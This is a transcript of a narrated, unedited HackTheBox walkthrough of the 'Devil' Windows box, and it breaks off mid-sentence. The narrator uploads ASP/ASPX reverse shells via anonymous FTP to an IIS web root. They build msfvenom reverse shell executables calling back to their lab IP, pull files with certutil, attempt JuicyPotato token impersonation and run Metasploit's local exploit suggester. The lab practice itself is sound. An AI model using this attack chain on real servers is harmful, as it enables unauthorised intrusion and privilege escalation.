Hey, what's up, everyone, and welcome back to another episode of Naked CTF. I am Jono from OpenLearnSec, and in this Naked CTF series, I will attempt to compromise and own a server from HackTheBox. This is my first attempt. I've not solved the box beforehand nor written anything about it. It's one take with no editing. So this could be 30 minutes or it could be 3 hours. Let's go. Today we're doing Devil. I forgot to launch it, so I've just done that now, which is an easy Windows box. While that's warming up, let's get ourselves set up here. So we'll do prep CTF prep, and that's going to be CTF HTTP, and then the IP address 10.10.10.5. And there we go. We've got our tmux session running, and we should have some note templates. Where is it? Devil as in development, I assume. Nope. I may have screwed that up. Just a second. Yes, I did screw that up. So it's platform, box name, then IP address. There we go. So here it is. We've got the Devil note template here. So as always, we start with recon or enumeration. We do need to move into the working directory. Devil. Last video was Dev Vortex, so this one is Devil. Nmap -p -a T4 timing. Verbose. Output to nmap1.txt, and we'll scan the IP. Let's have a look. See what is there. So far it's found 21 and 80. Pretty normal. So this is a Windows box, right? Yeah, okay. So let's see what else. Maybe we'll find some SMB ports or something on there, which would then, give us some further services to enumerate. So we'll let that run. Okay. Yeah, so as always, we'll try and complete it in adventure mode, which is just submitting the two flags, the user flag and the root flag. If we need to, we'll jump into guided mode to give us some hints about where to look next, or just make sure that we're actually on track. Is something that's always worth trying out as well. In the last video, I was cracking a password hash that came from a database, and I wasn't sure if that was actually the right path to be going down, so I checked the guided mode hints in here to see, if I was doing the right thing. Otherwise, I could have wasted a whole bunch of time, so thankfully the guided mode showed me that it was the correct next step. No major changes to workflow or anything like that. I do have some further actions to do. Today is the 1st of May. So if I look at my study plan, let's just have a quick review of that. Nope, not that one. Yep. And then, sorry, this one is going to be Devil. Okay. Made some good progress in this. I don't think I've fully worked out, my improved kind of version 2.0 workflow. Definitely increased automation. So I've got some aliases and other bits and pieces that help along the way. tmux, I'm feeling, level 100, basic, beginner. I've got some of the tmux commands and shortcuts and hotkeys and everything else memorized and able to recall them. So, and learn Metasploit was one that I put down, but I'm going to talk about Metasploit in another video because there's some concern about Metasploit. Not technical concerns, but concerns in the context of the OSCP exam. But we'll cover that in another video. All right, what do we got? 2 ports, 21, FTP, and port 80 IS, which is Windows Internet Information Server, I believe. Okay. So port 21, let's have a look. Open FTP, no TLS or SSH. The Nmap detect NSC script has already determined that anonymous login is allowed, which is cool. Okay. And then port 80 looks like it's IIS 7.5, which I believe, I don't know if it's a recent version or not. I think it's a little bit older. But it looks like in the anonymous FTP, like it does an initial directory listing, this directory listing looks like the web root for IIS. So, all right, let's have a look ourselves. So we'll FTP to the IP address. We'll log in as anonymous, like that. We'll do ls. Yeah. So if we get IIS start.htm, and then if we open the IP address in a browser. So first things first, let's make our notes. Port 21 FTP non-login permitted. Suspect that FTP directory root is the same as web root due to recognizable files like isstart.htm. Casual. Okay, so that's that. And then port 80, which is HTTP. Let's just start with a casual browse of website and potentially file directory num. So let's grab the IP, chuck it in the browser. I'm expecting the default, IIS7 page there. Okay, cool. And then just to confirm that, if we look at this page source, we can see kind of roughly what it looks like. Title IIS7. And then if we look at the HTML file that we downloaded, yeah, it's the same, right? So for whatever reason, Microsoft doesn't use index.htm, but they set this to the default document. So if you don't specify a path on the web server configuration will serve up iisstart.htm if it exists. So next question is, do we want to dig around in FTP any longer? So let's just do a little experiment. Let's create a test.htm and just say, please subscribe. Okay. And then we're going to FTP back to the anonymous FTP server. Then we're going to put test.htm. So now we've got this file, which I think will be in the web root. So if we go back to the web server and we do /test.htm, do we get anything back? Who knows? Please subscribe. There it is. So we do have control over the web root for this IIS server. So one thing that I haven't done before is like a reverse shell on IIS. So that will be something that we need to research, but I think that's going to be like the fastest way to get access to the box. or to get our foothold. So we can just say via FTP, we have read, write, control over web root for IIS. So what do we want to do next? Research. I'm assuming it's going to be like a classic ASP or .NET reverse shell we can implant on website. Another one might be, if that doesn't work, is vol research for IIS 7.5. Okay, so let's do both of those. First thing I'm going to do is rev shells. First thing I want to do is actually test what if we have ASP available to us, right? Because we can't do this with static HTML. We need some sort of server-side language, and it's been so long since I've done any ASP. Like classic ASP is yeah, I can't even remember the tag. So it's like percent open bracket percent close bracket percent means that it will be parsed by the ASP engine. So if I take that and I get my test, let's do test2.htm. Oh, let's do test2.asp. So I'm going to create a new file. I'm going to put that in there. That, if ASP is available, should execute. And we should see the current time or date time. So let's upload it. Put test2.asp. And then let's come back to our browser. Test2.asp. Yep, there we go. So we have ASP execution, which is awesome, which means that we now effectively have remote command execution on this box in the context of the service account, which is running IIS. Wonderful. So let's head over to our good old friend RevShells. And for the very first time in my life, I'm going to look up ASP. Nope. .NET. Nope. Classic ASP RevShell. Classic ASP. VB script reverse shell. Let's have a look at that. This is, oh, less than a year old. Okay. All right, let's have a look at the code. And okay, so it uses ASP and then it provides a language declarative. So I think this allows you to kind of work outside of the classic ASP syntax, which I guess is, I don't know, like it's all confusing. But what it means is that all of this code is VB script. So the ASP engine will use the VB script interpreter to run all of this. And what do we want to do? So we put our IP in here. We create a shell and a process. We run a command netstat -n. Keep the IP here 000. Extract the local IP from the output. And then, okay, so the payload effectively is PowerShell, where it creates using a one-liner PowerShell script to create a kind of raw TCP socket. Connects to my IP on my port and just handles the streaming of the data by reading and writing to the socket. And then it runs. Okay. Fair enough. Let's get a copy of this. We will attempt rev shell via ASP/VB script using this. Trying to do good on my notes. So rev shell. Here it is. Take that. Let's be super non-stealth and call our file reverse.asp. And then all we need to edit in here is replace with the actual IP address of the bind shell. Oh, this is... Okay, so is this a reverse shell or a bind shell? With your bind shell IP in the port below. Yeah. Okay. So that is our IP. Let's get our IP. Let's get out of that. IPA wrap on 0. No. IPA 10.10.14.23. Yeah. 10.10. 10.10.14.23. We'll leave the port number default 1313. So let's upload that. Put reverse.asp. And then let's just clear out of that. And then we can do NC NVLP. Was it 1331? 1313 or 1331? 1313. Okay. So that's what we want to be listening to on our side. And then we go back here and we hit reverse.asp. Then hopefully we get a connection. Nothing yet. Okay, that's not good. Let's have a look at the code again. Reverse.asp. 10.10 14.23 13.13. Okay. All right. There's our PowerShell kind of one-liner. Okay, we're not getting a reverse connection. Oh, yes, we are. Sorry. I didn't actually spot the connect. Okay. Cool. All right, let's make this a bit bigger so we can see what we're doing. All right, apologies. We don't have clear screen. So what are we going to do? Who am I? We are running as the IIS app pool /web. So let's go to our foothold. Reverse shell obtained via IIS using ASP VB script. Shell is in IIS app pool, app pool / web context or user. So that's who we are. We want to check our privs for this user. So this is like an internal who am I /priv. So what do we have? We have impersonate privilege and create global objects. Change notify privilege. So at this point, I'm trying to think whether it's our privask would be a via a misconfiguration, or it will be an actual exploit of a vulnerability that exists. For the life of me, what all of this commands are. Let's have a look at the environment. Nope. Let's do net user. Okay, so there's 1, 2, 3 users, default administrator, Babis, and guest. So I think let's just start with Hacktrix, and then app pool, web, IS. See if there's any way to like easily abuse this. I don't know. Like normally it's a fairly restrictive account, right? Yeah. Okay, so we validated that. We've got ASP. We don't need to discover. We don't need to do path traversal. Tilde vulnerability. Communication bypass. Like, this is all foothold stuff. Okay. And it's just I'm particularly interested. Particularly interested in this privilege. Allows the user to traverse folders to access permitted files or subfolders. Change notify privilege. Oh, this is the one that's probably more interesting, right? Yeah. Yeah, this is what we want. This is a privilege that is held by any process, allows the impersonation but not creation of any token that is given that a handle to it can be obtained. A privilege token be acquired from a Windows service DCOM by inducing it to perform NTLM authentication against an exploit, subsequently enabling the execution of the process with system privileges. Juicy potato, rogue, winner, etc. Okay. So what's the other one we got? Create global. Create token. Create global is not mentioned on here. Privesk. Okay. Gaining a foothold, exploiting a misconfigured web and FTP server. That's almost the exact scenario that we came across. Okay. Go away. Juicy finding. Very nice. Alright. Yep. There's the... So this is essentially what we did. Uploaded a test file. We could see it via... Hope this isn't the actual box that we're working on. Nah, it's got different nmap profile. Okay. Now we're in business. We could have used MSF Venom to generate a remote shell payload. That would have been a good idea. Make a mental note of that. So put your reverse shell. That's what we did. We curled it. And we similar user. Who am I? Yeah, IIS app pool. Yeah. We're a different application pool, but that's just a configuration thing. So we have impersonate. Yep. So we've got that. And you should definitely get excited when you find this privilege enabled. Yay! Actually exploitable in the same way. Service accounts and elevated accounts will have... It should be mentioned that both of these privileges can be used for the attacks below. It is more likely to find impersonate privilege without assign primary token privilege than the other way around. Okay. From a high level overview, okay, we're doing a potato attack. I like the name. Potato attack. Trick the NTLM authority system into authenticating via NTLM to a TCP endpoint we control. So that would be like a spoofed, that would be a socket that we run on our side. Man in the middle of this authentication attempt to locally negotiate a security token for NT authority. Impersonate the token we've just negotiated, given the account has the privileges to do so. Okay. Juicy potato attacks do not work on Windows 10. We haven't actually confirmed what our operating system and patch level and everything else is, right? Which is... I can't remember. Sysinfo? Nope. Okay. Grab a copy. Okay, it's kind of bothering me. Windows CMD find OS version. System info, not system. System. Okay, and we go back. Windows 7 Enterprise. Okay, so it's not Windows Server, which is interesting. But it does so let's hang on, let's just get organized here. System info, let's add it to our enumeration. So we'll grab this, and we're actually in a PowerShell session. Oh, nope. Okay, so we got that in case we need to refer to it. And this poor machine has only got 3 meg of memory? Huh? Can't be right. Might be using VMware Balloon Driver or something. Okay. Let's go back to here. Let's do that. Let's get our font size up again. So Windows 10 Professional is fine. So we need juicy potato. Fresh potatoes. Juicy. Okay. And just check the architecture. Are we 64 or 32-bit? We are x86. Yeah, x64. There we go. So we will want to... 2018 hasn't been updated since then. All right. Well, 6 years old, but if it works, it works. So we'll download that, and then let's go back to our dock. Oh, look, I didn't even have to Google it. It was already in the next. It was in the next part of the guide that we're looking at. Okay. So we want to upload the juicy potato. So let's do that. We'll create another shell. And we'll go into our working directory. Devil. We'll move our juicy potato into here. And we'll do Python 3 -m http.server, which is listing on 8,000. And then if I can remember the commands. Yep, there we go. We can shrink that down and move back up here. And then we want to copy it across. So yeah, we're in PowerShell. Invoke web request. So can we do IWR? IWR HTTP. IWR attack URI HTTP 1010 was our IP 10101423. EA 10101423 juicy potato.exe, and then out file, it's going to be juicypotato.exe. Nope, we didn't get a hit. So let's see. Let's go to temp. Nope. This shell seems a bit busted. Yeah, okay. Start that again. Here we go. IWP. Maybe do we have cert util? Yep. Oh, we can just upload it via FTP. Well, let's practice with certutil. Certutil URL cache -f http 10 10 14 23 8000 UC potato.exe, and then where we want to write it to, let's just do jp.exe. Okay, it's doing something, but we're not getting a hit. Oh, there we go. Got a hit on our web server. Access is denied. I'm thinking we don't have right access. Yeah, because we're in like a Windows System 32 directory. So let's find somewhere a little bit more suitable, like inetpub, that will definitely have. Oh my goodness. Let's do all that again. Certutil URL cache split -f http 10.10.14.23 8000 juicy potato.exe, and then juicy potato.exe. Hopefully we'll have write access to this directory. Okay, so there we can see jp.exe. So where are we? Okay, so we want to run a new netcat listener and then start a new shell using juicy potato. How does it know where to connect back to? Oh, because it's using the MSF Venom shell. Okay, let's do this. So we need an executable reverse shell now. We can't just... Yeah, alright, that makes sense. Okay, let's come down here. Kill this. And we want to run this command. And we're going to do 10.10.10 14.23. So the binary that we produced will be hard-coded with the IP address to connect back to for the reverse shell. Okay, everything else is fine. And then once that's done, we want to start the web server again, upload shell.exe, and then run juicy potato, and we pass it the name of the executable that we want to run as system with the new token. So we go back up here and we do same as before, right? Certutil, let's just go all the way up to here. Shell.exe, then shell.exe. I'm really glad that none of these CTF boxes have any countermeasures like Microsoft Defender or something, because I think it would be very difficult to evade using revshell.exe and all that sort of stuff, right? Like a lot of this would be pretty obvious to any kind of EDR. All right. Where are we going? We're going up here. Then we're going to run jp.exe. jp.exe. Then we're going to do -t star, -t star, -p shell.exe. Then the port that we want to use. What is 443? What is 443? You commonly see... Oh, okay. So it's saying try and use a common port for outbound, because if there's a firewall, like a local host level firewall, Windows firewall configured, yeah, you could get crunched by that. So let's just try. We specified 1337. Let's come down here. Let's start our new listener. And go. Okay. We're not going to have Telnet, are we? No. Alright, let's try this. So, yeah, but it uses 80 there. And then 443 there. Start a netcat. Oh, okay. So, this is the bind port, I believe. Yeah, okay. So we're going to do jp.exe -t star -p shell.exe and L80. No, 443. Let's just try shell.exe. Oh, it's because in PowerShell you've got to do everything like this, right? What is going on? Let's just get a regular command session. No. Alright, what are we missing here? Okay, let's do this again. Hey. Now we're not getting a shell on our original ASP-based shell. Attempting potato attack. So what's going on here? Let's kill this. That's FTP IP. Yeah, shell.exe is there. Reverse.asp is there. Is the web server responding? Yes, it is. Reverse.asp. But we don't have our listener running. Reverse.asp. I'm going to increment the port number on the ASP-based shell. Okay, first of all, let's get into the right working directory. remote.exe, remote.asp. Nope. Vim reverse.asp. Let's change 13.13 to 13.14. And there it is there. I should be using a global replace, but yes, 13.13. X. Okay, done. All right, FTP IP. Anonymous. Remove reverse.asp. RM reverse.asp. Del reverse.asp. Put reverse.asp. Access is denied. What? Put test.htm. Put touch test.asp. Test.asp. Del reverse.asp. Oh my goodness. Okay. Reverse 2. I think it's because there's still a long-running... Yeah, there's still a long-running web request, so that reverse.asp file is still locked by one of the IIS processes. So let's just work around it. Reverse2.asp, done, fine, whatever. And then let's start the reverse shell handler, 13.14, and do reverse 2. Oh, there we go. Nothing. Oh my goodness. Oh, IP hasn't changed, has it? 10.10.14.23, nope. I'm gonna recycle the box because I think that there's something weird going on with IIS. I think it's got into a funny state. Oh no. Someone else is on here as well. Maybe that's what's happening. Because that reverse shell should be, that ASP reverse shell should be stable. And I really got to get better at just moving around in PowerShell. Like I kind of treat it like command, you know, a regular CMD command prompt. And there's all sorts of little differences that I forget about. Chain will be reset. Okay. Okay, it's going. Someone else is on here. FTP IP. Might not be up yet. Still spawning. There we go. Back up. Ooh, I think the services are still warming up. to launch reverse shell using system token gained via abuse of impersonate privilege. See, there is a Metasploit module for this, but I'm not going to use it because I will explain in another video why I'm not going to use it. Not that I don't like Metasploit. You've seen me, you know, kind of wrangle my way through it in the past. 10.10.10.5. ls put reverse 2.asp. Done. Exit. 13.14. Go. Connect. Good. Okay. Let's go back to the web root. Let's just cheat a little, not cheat, but let's just use what's available to us. And we'll upload the juicy potato and our reverse shell.exe or our shell.exe payload. So we need to enable binary transfer, put juicy potato, put shell.exe, exit foreground, ls star.exe, juicy. Let's just test the shell. Oh, it's backslash, isn't it? Why can I not execute anything? Okay, PowerShell. This is some very low level stuff, but I feel like I'm doing something wrong here, or the shell is being weird. Open PowerShell. Yeah, it's dot backslash, right? So dot backslash shell.exe. Duh. This is a bit weird, I gotta say. Don't quite know what's going on here. If we run juicy potato.exe, so it pauses, but yeah, look, I think this reverse shell method via ASP is a little bit strange. Like maybe I'm not getting, you know, the Windows equivalent of standard out. So what I'm going to do is generate a new ASP reverse shell payload. And I'm going to do that using the method recommended here, which is to use MSF Venom. So let's take this. Let's paste all that. Let's change this to 10, 10, 14, 23, port 13, 15. And I don't know how different the code will be from the one that we're using, but let's see. Maybe it's like it's a bit more stable as a shell. ASPX. Yeah, this is C#, like it's totally different. Okay. So let's FTP that up. Anonymous. Let's put shell.aspx exit 1315, and then we need shell.aspx. And ASPX is different to ASP. So I don't know if it's actually going to work. Because it's going to depend on the availability of the .NET runtime and a whole bunch of other stuff, right? So let's have a look. MSF, Venom. First of all, let's just double check what we do here. 10, 10, 14, 23. 10, 10, 14, 23. Yep, IP is correct. 13, 15. But if I listen on 1315 and then I go to shell.aspx, I don't know if it's spawning a background process, but the web browser isn't kind of hanging like you normally, well, like we had in the previous shell. So let's have a look. Reverse TCP ASP. Okay, ASP. Yeah, so you can just drop ASPX in favor of ASP. So let's try that. So file type is ASP. Let's just grab another port number just to be sure. And let's call this shell2.asp. Let's have a look. Yeah. So now it's this really funny obfuscated VB script. And let's go. FTP, IP. Non. We just use non? Nope. User anonymous. Put shell 2.asp. Start our listener. Settings 16, right? 1316. Correct. Okay, 1316. Now we want to do shell 2.asp. And it crashed. Okay. So, yeah. Maybe we have to go back to the original one. Yeah, it's a 500 internal error, which means something is balked in the reverse shell code. What did we call it? FTP IP anonymous. What was our first one? Reverse 2.asp. I don't think we need binary mode for that, right? I don't know. Maybe let's just try it anyway. Put shell 2.asp. Shell 2.asp. Yeah, it still crashes. Okay. So reverse 2.asp, the port 10, 10, 14, 23. God, I'm so paranoid about my IP. And we're going to listen on 1314. Okay. Reverse 2.asp. There's our shell again. But no. Doesn't work. Now the second time. Second time. Second time we don't get a connection. Okay. Alright, this is getting messy. Reverse 2.asp to reverse 3.asp. Bim reverse 3.asp. So we're going to change that to 1318. We're going to change. Okay. Scanning for it. Where is it? There it is. 1318. FTP IP put reverse 3.asp exit 1318. I'd really like to know what I'm doing wrong here, because it's weird that it works the first time and then not the second time. Okay. We have no way to restart IIS. Alright, I guess we got no choice but to restart the box. So going back to here. So we enumerate. We've got this particular privilege available, which is a huge finding. You should definitely get excited. Okay, Windows 10. Let's just validate this is actually going to work. Windows 7 Enterprise, yeah. We're not on 10. Does not work on Windows 10 versions equal to or greater than 1809. Well, we're not on 10. And our build is 7600. But these build or version numbers are for Windows 10. All right. So let's just try uploading again. Go, go, go. So it's weird that the ASPX, which is C# doesn't work, it seems, at all. And then classic ASP, which is VB script. So put reverse 3.asp, exit, open the listener. Let's just check. 18, 13, 18. Let's just check. Reverse 3, run, connection. Okay, works first time every time. Just doesn't work second time every time. And then let's come down here and upload our binaries. So we'll FTP again. Binary put star.exe. So that only gave us juicy potato. What about shell? Shell.exe. Thank you. So our shell.exe MSF Venom history grep MSF Venom. Oh man, I can't remember the port number. Okay, so we're still good there. I think it was 1337. And I would expect that if we go into our directory here, www.root, and we run shell.exe, we should see a connection on 1337, but we don't. Maybe there is a firewall, but we're able to get outbound 1338. I don't know. Let's do this. No, I just killed it again. Oh, worked the second time. Wonderful. So let's do this. Let's rebuild the shell.exe. Yep. And let's just use netstat nvlp. I don't think I've got anything running on 443. No. Okay. So let's call it shell 2. Let's do 443. Let's do our IP. 10, 10, 14, 23. Build a new reverse shell executable. Upload it and let's try it. FTP IP. Anonymous. Binary. Put shell2.exe. Exit. And then we want to listen on 443. And then if we go back up here, we do dir. Nope, we want to go back to inet pub www root. We want to do shell2.exe. Maybe there's something just screwy. Shell2.exe. C inet pub www root shell2.exe. We're not getting any connection back. But if we run a binary that's kind of somewhere else on the system, like certutil, we do see maybe launch a new PowerShell session. No. Please work a third time. And it's not going to work. Oh my god. This is bad. I might be completely on the wrong track here. I might be trying to abuse this impersonate privilege when there's an easier option. So I'm going to jump into the hints. What is running on 21? Microsoft FTP'd. Microsoft FTPD. What? Yes. ASP. What is the file extension? What file extension is executed as a script on the web server? Don't include the dot. PHP? So we've been using ASP. Okay, we might have gone down the wrong track here trying to do stuff with ASP, but it still kind of worked. So let's have a look at the response header. ASP.NET. Okay. ASP capital? ASPX? Oh, okay. Okay. Right. So ASPX is supported. So let's try a different payload for the first reverse shell as the IIS. But we did that, right? We generated one using MSF Venom. Yeah. And ten, 10, 14, 23, 13, 15. Let's just try firing that again. So FTP IP put shell.aspx shell.aspx put shell.bin put shell.aspx exit 1315. What's the port again? Sorry, I'm a little tired today, so my brain is not fully engaged. 10, 10, 14, 23, 13, 15. 13, 15. And it's going to be shell.aspx. Shell.aspx. Yeah, nothing. Like the web request completes. So I think this payload is coming out of MSF Venom is bust. So let's try a different one. Reverse shell. ASPX reverse shell. 4 years ago. Just because it's old doesn't mean it doesn't work. Alright. Let's grab this. And give this one a try. So shell 2.aspx. And then we're going to yeah, this looks like it's doing raw socket as well. And then we're going to update this to be our IP. 10, 10, 14, 23. Quick double check. 10, 10, 14, 23. And let's do 13 FTP IP. Input shell to ASPX 1320. Then we're going to try and run that. Okay, that looks better because you see how the HTTP request is staying open. So with any luck, yes. And now we've got a normal command prompt rather than that weird busted PowerShell command prompt that didn't seem to be behaving correctly. So inetpub we're still listening on 443 here. So if we run shell2.exe, ooh, okay, maybe this is why. So system architecture is going to be x64, right? Windows x64 shell reverse TCP. Okay. All right. Well, let's try and run juicy hot potato.exe anyway. It helps if I spell it correctly. And that's no good either. Well, we know that this is x64, right? System type x64. Oh no. So even though... Yeah, okay. So even though it's recognizing it as a 64-bit processor, it's actually 32-bit Windows. Oh my god, okay. So what we need to do is, let's just keep this shell running. Hopefully it works. Very good. Then we need to rebuild our reverse shell executable payload. So that's going to be over here. History, grep, MSFV. And we want to run 11. No, let's do 4. And then we want to do 30 x64. What is So we're going to need the 32-bit version of Juicy Potato. And we're going to need a 32-bit version of our shell. So let's do one thing at a time. 32. .32-bit. All right. Cheat sheets are always good. Non-metopera. Yeah, this is good for OSCP. I might mark this. Yeah, so we need to replace x64 with x86. Oops. Didn't mean to do that. Okay, hang on. 86 x86. Hopefully that will build okay. And we can quickly test this, right? So we can just upload it, start a listener on 1337 and run it. Invalid payload, Windows x86 shell reverse TCP. Windows shell. Okay, so it's a different path for the payload name. Windows shell. So yeah, this is all stuff you don't really want to be looking up during the OSCP exam. So that's why I'm going to take some very good notes from today, assuming all of this works. What? Windows. So if you know, Windows shell. Oh. Okay. let's rename it to be super clear x86. Okay, let's stage this. And bin put shell x86. Okay, then if we come up here, no, let's do this first. Let's start a listener 1337, my port of choice, because I am elite. Not really, it's a bit of a joke. And now what's happened to this session? It's probably died. Okay. inet pub. So now our ASPX shell is unstable. Are you kidding me? Oh no, there we go. Okay, it was just slow. Too impatient. So now if we run shell x86.exe, we should see a connection here. Yes. Okay. But there's no actual payload, right? It's a connection, but nothing actually there. That's concerning because we should effectively get a prompt. Oh, because it's the wrong payload, John. Okay. RM shell. Okay. x86. Run this again. This is a staged payload. We want Windows shell reverse TCP. Kind of just brute forcing my way through this today. IP. Anonymous. Random. Bin. ls. rm. Del. Shell. Oh, that's. Yep. Shell x86.exe. Nope. Because the binary is now backgrounded. And it's going to be listening on that port, which means we need to do another port because that port is going to be occupied on the server side because this guy, even though it's terminated, looks like it's terminated, it's actually still kind of resident as a process. So let's try this for the 56th time. Bin put shell x86 v2. Now we run our listener. 1338. We go up here. Start at exe. Shell x86 v2.exe. Now we got a connection. Okay, so there's no privesc here because it's in the same context as the user that we already had. So now we need to try the juicy potato attack. Now, will this work again? Or is it gonna still be bound to that port? Okay. Okay, no, it's good. It's good. It's good. It's good. It's good. So now we need juicy potato. Juicy potato. But we need a 32-bit version. Leverages the privilege escalation chain based on bits service, having a man in the middle when you have SE impersonate or blah. During a Windows build review, we found a setup where bits was intentionally disabled and ports okay. We decided to weaponize this. Okay. Okay, this is their build server. Where the artifacts have been deleted. So we maybe need, because there's only this one binary and I'm pretty sure it's like if we do file juicy potato x86-64, so technically it should work, right? Juicy, cannot still spell juicy correct. Yeah. So I think we need an explicit x86 version. So juicy potato. Need a 32-bit version, you can find it here. Aha, okay, so it's a separate repository altogether. See, juicy potato x86, whereas this one is a different repository and different owner. So this lovely person, Ivan IT Learning, has recompiled it for 32-bit. So let's download that. Let's copy it into our working directory. Copy, downloads, juicy potato. Let's just move it. And let's make it easier. jp86.exe. jpx86.exe. Yep, let's upload that. Let's put jp86. Okay. Now, if we go back to our remote shell as our kind of privileged user, and we run ls, the jpx86.exe cannot be run in DOS mode. What? All right, maybe the transfer to juicy potato went wrong. The FTP upload maybe it was done in non-binary transfer, so del juicy. Oh no. There we go. Okay. The bin put juicy potato. Let's try and run that again. Juicy potato.exe. Yeah, okay. So neither of those versions work. yeah, this is like, I can't remember the name of this module, but once I do remember, I'll be able to find it. Let's check the user flag. Babis. Classic. .NET at cool. Classic. .NET. Oh, okay. What are we gonna do? So, like the path that Hacktobox is steering us down is towards using Metasploit. So it's like Metasploit recommender or something. Local exploit suggester. Local exploit suggester. Is that right? Suggester, not suggester, suggester. Okay. That's the last step. So really, in this particular box, they're saying just use Metasploit. For the sake of getting it done, I'm going to do that. So let's fire it up. Right. So again, we need to rely on my extremely limited. See, I'm not done. I want to use Juicy Potato. Juicy Potato x86. Juicy Potato. Oh, look, this has got its own page on Hactrix, so maybe we can learn a bit more here. Rogue Potato, Prince Buffer, God Potato. There's Rotten Potato. I don't know what the difference is. No need for interpreter or any other tools. By default, it runs command exit a pop command shell. I mean, this one's quite old as well. I know I keep. Do they even have a? Yeah, doesn't even look like they got a 32-bit version. Yeah, you see, that's what I would expect. So it looks like you sometimes have to jump around and find a unique or a working CLS ID. Lonely potato? Lonely potato became juicy potato. Okay. Juicy potato, 32-bit. Ooh. Don't want to read the write-up. So this is the guy who produced the 32-bit version of Juicy Potato. So the original exploit was called Rotten Potato. Okay. Finally, I didn't have to rely on PSExec or kernel exploits to get system. There's Juicy Potato. Okay, so this is effectively a kernel exploit. But if we do jpx86.exe program cannot be run in DOS. Is there any workaround for that? I mean, I've seen it a million times in my life. Try running it Windows directly, compatibility settings. It's not a 16-bit. Come on. Let's try passing it to command.exe. I don't know. Long shot. -c, /c. command/c jpx86.exe. Same deal. jpx86.exe. Juicy potato.exe. Juicy potato.exe. I mean, so this one is definitely 64-bit only, because why would have that guy gone and built a 32-bit version? Alright, I think we're going to have to use Metasploit. And now I have to dredge up all my knowledge. Metasploit, listen. Use interpreter locally. So we want to do use exploit multi-handler. Okay, let's just jump out of here. Actually, let's create a new window just to be a little more organized. I feel like this is taking a lot longer than it should have, but learning a lot along the way. Definitely identified some gaps in my notes where I need this information at my fingertips. Things like MSF Venom payloads, all that sort of stuff. Exploit multi-handler. Steamed hams. The Aurora Borealis. Simpsons reference. Show options. Set L host is on 0. Set L port is going to be 1320. Run. So now we're going to have to exit out of this. And then we're going to have to run our shell again. Okay. So basically we've got the same reverse shell just now in Meteprota. And we don't want to abort, but we do want to... What do we want to do? We want to... we want to break out of this. Break out of Metasploit multi-handler. I just can't remember the keys. Because I want to be able to run that background. That's it. Okay. Now we want to do use, and it's going to be the local exploit host multi recon local exploit suggester. Host multi recon local exploit suggester. Show options. Set session 1. Run. Okay. So just to explain, the reverse shell, instead of connecting back to Netcat, which I was running, is now connecting back to a the local handler provided by Metasploit. We can now background that connection, and we can run other Metasploit modules against that kind of open session, which is what we're doing now. And hopefully it will suggest the hot potato attack, and it'll give us a module to use. No suggestions of... Wait, what? Okay. That's not cool. Show sessions. Why has it detected it as Spark BSD? Use. Multi. Use. Oh god. Local. Exploit multi-handler. Use exploit multi-handler. Go options. So for some reason it is detecting it as BSD. Show sessions. Session. Local exploit suggest or wrong. Sessions minus U1. Yeah, I think we need to upgrade that for the local exploit suggested to work properly. I think. It's a working theory. May not be correct. And it doesn't look like the upgrade is working either. I wonder if the session is dead. Yeah. So let's do sessions minus I1. Who am I? Exit. Okay. Bye-bye. Bought. Yep. Okay. So show options. Wildcard target. 1320. Let's just try again. Oops. Let's run it first. Run. Wait until it's listening. And then, okay. Then we background that. Yes, sessions minus L. And it still says Spark BSD. So we're gonna do Metasploit change session change OS. Interpreter session architecture is not tracked in MSF properly. That's once an interpreter session has been started. Interpreter session. Oops. Spark BSD instead of Windows. Yeah. Okay, this looks like our issue. Oh, okay. So we need to set payload. Generic shell. Okay. No, but that's the payload from an exploit. So payload options. Handler, Metasploit, handler, Windows. Yeah, so we've used the wrong one. Handler. Use exploit multi-handler. Yeah, that's what we were using. Sessions minus L. Session minus I. 2. Sessions. Okay, let's fill that. Set payload. Uh-oh. And then we just want Windows. Windows shell bind TCP. Windows shell bind TCP. Run. Then let's do this. And hopefully we get what we need. Nope. Set payload. Windows. Windows shell. Reverse TCP. Nice and generic. Okay. Command shell session 3 is not valid and will be closed. Okay. What to do? What to do? Let's think this through. We've got our reverse shell being initiated by an ASPX file that we've injected. So I'm thinking we might need to really want to get this exploit suggester thing working, because I'm worried that this hot potato vulnerability may not be the right one. Given there seems to be a lack of x86 support. Like maybe there's another or we could upload a new executable payload and then run it from we could okay, sorry, I'm just trying to think this through. So we could we could generate a new exe using MSF Venom that has the Meterpreter payload. Yeah, let's do that. MSF Venom, where's our cheat sheet? Where is our cheat sheet? Stageless, non-Meterpreter web payloads, non-Meterpreter binaries. So we want a Meterpreter binary, yeah? x86. Yeah, let's do this. And then we can use our reverse shell. And we want stageless, right? Stageless. Windows Meterpreter. Windows Meterpreter. What's the difference? Nothing. Okay, let's kill this. Let's go back to first principles, right? So if we come into here, yeah, because I do want to run that local exploit suggester because it's not a perfect match. I mean, the fact that there's only one 32-bit executable out there for this hot potato vulnerability, and it doesn't work. So let's create a new payload. So we're going to call this mshell. We're going to call this 1010 14.23, and we're going to give it a unique port 4444. Okay. Then we're going to upload that, and we're going to start our new shell. What was it again? Okay, let's get our original rev shell going. Show options 1320. Okay. NC NVLP 1320. We come up here and we do FTP IP. Okay, I think this is going to work. And then we do bin and we do put mshell like that. Very good. We've stopped the listener in Metasploit, so we should be able to go back here and we'll catch it using Netcat. Yep, there we go. Then we want to start a listener on here. So if we have a Meterpreter binary, exploit multi-handler set payload is this. That's what we used, right? Windows/Meterpreter/ Windows Meterpreter reverse TCP. Windows Meterpreter. Alright, let's just grab this. Oh. this. Try again. And let's go back to Metasploit. Set payload. Yes. Oh, that's not what I wanted. Show options. And L port is going to be 4444. Then we go back to here. And we have our shell. We go back to inet pub. And then the web root. And then we have M shell x86. But we're going to have to run this first. .exe. And then interpreter. Brilliant. Okay. So now we can do use. Alright, so many modules and everything else that I can't remember. Local exploit suggester. So it's going to be host multi-recon modules. Host multi-recon. No. Use. Host multi-recon local exploit suggester. No, that's not it. Within interpreter session. Okay. Okay. So how do we run it once we're within the interpreter session? I have done this before, I just can't remember. Let's look at the docs. So now we've got interpreter running on session 4, right? So now we can go use host multi-recon local exploit suggester. Okay, it's all coming back to me now. Show options. Set session is to 4. Run. Okay, now it's correctly identifying x86 Windows. So let's see if the potato turns up in this list of suggested local exploits for privilege escalation. Okay, it's full screen. Wow, 41 returned. My goodness. Um, Rotten Potato MS Bulletin. Microsoft Bulletin. So it'd be good to know which Microsoft reference this actually works against. Use sweet potato to rule them all. If the machine is older than Windows 10, use Rogue. If the machine is earlier than Windows 10, use Juicy Potato. Well, we couldn't run Juicy Potato. Because, yeah. Uh, 16075. 16075. So maybe this is the one. Let's grab 